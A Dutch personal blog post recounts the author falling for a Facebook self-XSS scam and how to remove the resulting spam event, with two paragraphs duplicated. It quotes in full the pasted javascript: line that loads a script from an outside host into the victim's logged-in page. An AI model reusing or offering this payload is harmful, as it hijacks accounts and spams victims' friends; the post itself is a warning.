Als je goed nadenkt, doe je hier natuurlijk niet aan mee, maar ook ik heb mijn ijdele kanten, ben nieuwsgierig en niet altijd even alert. Ik voldoe dus aan de instructie, zie vervolgens dat er iets een minuut kan duren, wat me wel alarmmeert. Klik de pagina meteen weg, maar het kwaad is al geschied. Mijn mailbox stroomt vol met verzonden evenement-uitnodigingen en ook meteen de 'Man, wat maak je me nou'-reacties van vrienden die niet zo stom zijn.
En tot ons beider plezier trapt een ook computerende vriend er ook in, wij dier er prat op gaan nooit in virus te trappen.
Vervolgens maar eens wat beter naar de te pasten url gekeken:
javascript:(a=(b=document).createElement('script')).src='//bbbindia4.in/jsp.php',b.body.appendChild(a);void(0)
Dan het jsp.php scrippie opgehaald: linkje
...
Hmm, het eerste stuk is wel te volgen, maar al snel daarna wordt het toch tamelijk obscuur allemaal. En ongewtijfeld is dat niet zonder reden. Je kunt leesbaar programmeren, en je kunt onleesbaar programmeren; in dat laatste geval is dat doorgaan met reden.
Maar voor een javascript guru is het ongetwijfeld kinderspel.
Maar voor een javascript guru is het ongetwijfeld kinderspel.
De hamvraag, die ik niet kan beantwoorden, is natuurlijk, doet het script iets onschuldigs wat wel vervelend is of is het beyond onschuldig?
Het helpt ook niet dat je moet zoeken om uit te vinden hoe ongewenste applicatie te verwidjeren van Facebook (account-instellingen, links onderin een linkje 'Je instellingen bewerken voor het gebruiken van toepassingen, games en websites.'). De gewraakte applicatie staat er niet bij, want het blijkt een evenement te zijn, gepost op je eigen profiel, gericht aan al je vrienden. Evenement verwijderen does the trick.
Het helpt ook niet dat je moet zoeken om uit te vinden hoe ongewenste applicatie te verwidjeren van Facebook (account-instellingen, links onderin een linkje 'Je instellingen bewerken voor het gebruiken van toepassingen, games en websites.'). De gewraakte applicatie staat er niet bij, want het blijkt een evenement te zijn, gepost op je eigen profiel, gericht aan al je vrienden. Evenement verwijderen does the trick.
Geen opmerkingen:
Een reactie posten